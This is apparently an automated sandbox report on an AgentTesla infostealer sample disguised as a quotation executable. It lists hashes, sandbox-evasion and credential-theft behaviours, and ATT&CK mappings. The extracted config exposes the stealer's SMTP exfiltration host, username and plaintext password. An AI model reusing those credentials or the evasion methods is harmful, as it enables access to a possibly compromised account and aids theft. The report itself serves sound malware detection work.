Overview

overview

10

Static

static

Quotation_...03.exe

windows7_x64

10

Quotation_...03.exe

windows10-2004_x64

10

Sharing

Copy URL
Twitter E-mail

General

  • Target

    5a3652c9d19862d41a9aa461544ca78f2a3ea9c3ea00f9dd4ad92da4d2d42f14

  • Size

    398KB

  • Sample

    220521-dfq2rsafgr

  • MD5

    07d5e20e3187510923a41dae53cbd993

  • SHA1

    3ad58425ee0b1744117b3c6422be13bc70a2a0dc

  • SHA256

    5a3652c9d19862d41a9aa461544ca78f2a3ea9c3ea00f9dd4ad92da4d2d42f14

  • SHA512

    4e68ed1f7a655e0518b3cee7445f0a09e6fbc5a975bf4872f7165a3979597ad6fc3437fee6a644ec21b07d85804265730299ef40e5c47652fc8dcc6977b59e76

Score
10/10
agentteslacollectionevasionkeyloggerspywarestealertrojan

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:     smtp
  • Host:
    mail.novadelmar.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    comprasnova2020

Extracted

Credentials

  • Protocol:     smtp
  • Host:
    mail.novadelmar.com
  • Port:
    587
  • Username:
    [email protected]
  • Password:
    comprasnova2020

Targets

    • Target

      Quotation_AxFlow_0943565624453003.exe

    • Size

      431KB

    • MD5

      6bdc3dc75ab89568188371c346b93c71

    • SHA1

      6274da4083637f214ecab18cc02716647f07112f

    • SHA256

      bc3401d05a180606f7593e377e8bb1070c06c90cde1e268954f43e44d8b571a6

    • SHA512

      7deb8de750e66ac796ffc84c545a8140448e100564b715abe8256e84501a1bb204f77e320948a6fc5e8afab123719b82f41c0ed5e6a6ad8a42d0c0c7e56550ab

    Score
    10/10
    agentteslacollectionevasionkeyloggerspywarestealertrojan

    • AgentTesla

      Agent Tesla is a remote access tool (RAT) written in visual basic.

      keyloggertrojanstealerspywareagenttesla

    • AgentTesla Payload

    • Looks for VirtualBox Guest Additions in registry

      evasion

    • Looks for VMWare Tools registry key

      evasion

    • Checks BIOS information in registry

      BIOS information is often read in order to detect sandboxing environments.

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • Reads data files stored by FTP clients

      Tries to access configuration files associated with programs like FileZilla.

      spywarestealer

    • Reads user/profile data of local email clients

      Email clients store some user data on disk where infostealers will often target it.

      spywarestealer

    • Reads user/profile data of web browsers

      Infostealers often target stored browser data, which can include saved credentials etc.

      spywarestealer

    • Accesses Microsoft Outlook profiles

      collection

    • Maps connected drives based on registry

      Disk information is often read in order to detect sandboxing environments.

    • Suspicious use of SetThreadContext

    behavioral1behavioral2

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

1
T1053

Persistence

Scheduled Task

1
T1053

Privilege Escalation

Scheduled Task

1
T1053

Defense Evasion

Virtualization/Sandbox Evasion

2
T1497

Credential Access

Credentials in Files

3
T1081

Discovery

Query Registry

5
T1012

Virtualization/Sandbox Evasion

2
T1497

System Information Discovery

4
T1082

Peripheral Device Discovery

1
T1120

Lateral Movement

Collection

Data from Local System

3
T1005

Email Collection

1
T1114

Exfiltration

Command and Control

Impact

Tasks